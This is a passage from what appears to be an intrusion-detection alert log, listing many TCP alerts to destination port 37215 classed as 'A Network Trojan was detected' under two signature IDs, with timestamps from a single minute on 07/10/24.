                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2829579
                  Source Port:48414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137377
                  SID:2835222
                  Source Port:45942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186875
                  SID:2829579
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761940
                  SID:2829579
                  Source Port:57410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571728
                  SID:2835222
                  Source Port:53466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2829579
                  Source Port:39310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.092607
                  SID:2835222
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.728995
                  SID:2835222
                  Source Port:42114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.529924
                  SID:2835222
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702658
                  SID:2829579
                  Source Port:60552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283182
                  SID:2829579
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.210665
                  SID:2829579
                  Source Port:59066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869109
                  SID:2835222
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842120
                  SID:2835222
                  Source Port:37878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2835222
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994247
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.781725
                  SID:2829579
                  Source Port:48550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655556
                  SID:2835222
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667979
                  SID:2829579
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2835222
                  Source Port:40314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2829579
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702209
                  SID:2835222
                  Source Port:54276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2829579
                  Source Port:47326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.659206
                  SID:2829579
                  Source Port:56434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2835222
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.400468
                  SID:2829579
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.844972
                  SID:2835222
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610911
                  SID:2829579
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2835222
                  Source Port:43158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2835222
                  Source Port:55682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.564039
                  SID:2829579
                  Source Port:45054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2835222
                  Source Port:33414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.889190
                  SID:2835222
                  Source Port:43686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2829579
                  Source Port:43514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315595
                  SID:2835222
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2829579
                  Source Port:55970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.297520
                  SID:2835222
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861603
                  SID:2829579
                  Source Port:33980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083283
                  SID:2829579
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452507
                  SID:2829579
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.335280
                  SID:2829579
                  Source Port:47846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.071296
                  SID:2835222
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.597937
                  SID:2829579
                  Source Port:33578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136124
                  SID:2829579
                  Source Port:36912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583025
                  SID:2829579
                  Source Port:44380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.839334
                  SID:2835222
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.918271
                  SID:2829579
                  Source Port:35430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.301453
                  SID:2835222
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118547
                  SID:2835222
                  Source Port:41720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2829579
                  Source Port:43718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772841
                  SID:2829579
                  Source Port:37190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.441274
                  SID:2835222
                  Source Port:34914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288266
                  SID:2835222
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657792
                  SID:2829579
                  Source Port:56798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2829579
                  Source Port:40884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.720091
                  SID:2835222
                  Source Port:33214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624434
                  SID:2829579
                  Source Port:43422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2829579
                  Source Port:45370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2835222
                  Source Port:42498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617966
                  SID:2835222
                  Source Port:36866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941527
                  SID:2835222
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.121726
                  SID:2835222
                  Source Port:58674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.461538
                  SID:2829579
                  Source Port:43728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.554327
                  SID:2829579
                  Source Port:54142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766874
                  SID:2829579
                  Source Port:57728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842424
                  SID:2835222
                  Source Port:35596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.084495
                  SID:2829579
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:56480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2835222
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.090396
                  SID:2829579
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.861410
                  SID:2835222
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.418151
                  SID:2835222
                  Source Port:55336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.114330
                  SID:2829579
                  Source Port:38288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575874
                  SID:2829579
                  Source Port:56904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876739
                  SID:2835222
                  Source Port:56978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2829579
                  Source Port:53344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.220908
                  SID:2835222
                  Source Port:47308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2829579
                  Source Port:57562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861640
                  SID:2829579
                  Source Port:50912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.017294
                  SID:2835222
                  Source Port:50330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.092511
                  SID:2829579
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2835222
                  Source Port:59876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520266
                  SID:2829579
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2829579
                  Source Port:52532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985785
                  SID:2829579
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959708
                  SID:2829579
                  Source Port:51998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.874379
                  SID:2829579
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.128635
                  SID:2829579
                  Source Port:60854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850182
                  SID:2829579
                  Source Port:41808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147425
                  SID:2829579
                  Source Port:42056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.652301
                  SID:2829579
                  Source Port:50540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:52090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2829579
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923513
                  SID:2835222
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776815
                  SID:2835222
                  Source Port:44032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302705
                  SID:2829579
                  Source Port:42156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2829579
                  Source Port:56864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2835222
                  Source Port:48400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.626418
                  SID:2835222
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2835222
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192281
                  SID:2835222
                  Source Port:38848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2829579
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202638
                  SID:2829579
                  Source Port:48498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.352780
                  SID:2835222
                  Source Port:53748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.127957
                  SID:2835222
                  Source Port:37260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.990859
                  SID:2829579
                  Source Port:57730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.856531
                  SID:2829579
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381033
                  SID:2835222
                  Source Port:57836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.085115
                  SID:2829579
                  Source Port:56568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.551823
                  SID:2829579
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.540991
                  SID:2829579
                  Source Port:37198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2835222
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2835222
                  Source Port:58026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.205832
                  SID:2829579
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.140373
                  SID:2835222
                  Source Port:38542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.809253
                  SID:2835222
                  Source Port:47162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.555900
                  SID:2835222
                  Source Port:47610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2829579
                  Source Port:53770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2829579
                  Source Port:33306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.484683
                  SID:2829579
                  Source Port:35574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967608
                  SID:2835222
                  Source Port:37962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.268037
                  SID:2829579
                  Source Port:43974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2829579
                  Source Port:38922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596556
                  SID:2829579
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.856159
                  SID:2829579
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903866
                  SID:2829579
                  Source Port:40336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2835222
                  Source Port:54192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245667
                  SID:2829579
                  Source Port:44258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2829579
                  Source Port:55482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.413820
                  SID:2829579
                  Source Port:51206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.450568
                  SID:2829579
                  Source Port:36492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397660
                  SID:2835222
                  Source Port:46648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2829579
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580773
                  SID:2829579
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.839757
                  SID:2835222
                  Source Port:39370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060029
                  SID:2835222
                  Source Port:56960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2829579
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.343465
                  SID:2829579
                  Source Port:43534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2829579
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240891
                  SID:2829579
                  Source Port:56576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877508
                  SID:2835222
                  Source Port:59078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2835222
                  Source Port:41506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453697
                  SID:2835222
                  Source Port:43644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.514336
                  SID:2829579
                  Source Port:41608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.968756
                  SID:2829579
                  Source Port:51916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.876812
                  SID:2835222
                  Source Port:49474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2829579
                  Source Port:45520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2829579
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2835222
                  Source Port:47510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2835222
                  Source Port:33944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2829579
                  Source Port:34800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.435309
                  SID:2835222
                  Source Port:53886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.259502
                  SID:2829579
                  Source Port:36004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2829579
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2829579
                  Source Port:53650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2829579
                  Source Port:54334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614287
                  SID:2829579
                  Source Port:52872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.569175
                  SID:2829579
                  Source Port:54376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2829579
                  Source Port:52832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2829579
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2835222
                  Source Port:36444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819807
                  SID:2829579
                  Source Port:39736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.931527
                  SID:2829579
                  Source Port:37812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2829579
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.664680
                  SID:2835222
                  Source Port:54638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.613863
                  SID:2835222
                  Source Port:33772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2829579
                  Source Port:51020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372114
                  SID:2835222
                  Source Port:35184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2835222
                  Source Port:52644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538394
                  SID:2835222
                  Source Port:39800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.587846
                  SID:2829579
                  Source Port:36236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2829579
                  Source Port:43100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.458105
                  SID:2829579
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647511
                  SID:2835222
                  Source Port:54532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.418870
                  SID:2835222
                  Source Port:58814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107350
                  SID:2829579
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2829579
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2835222
                  Source Port:34094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.392716
                  SID:2829579
                  Source Port:48328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2829579
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.057474
                  SID:2835222
                  Source Port:39592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2835222
                  Source Port:37592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082325
                  SID:2829579
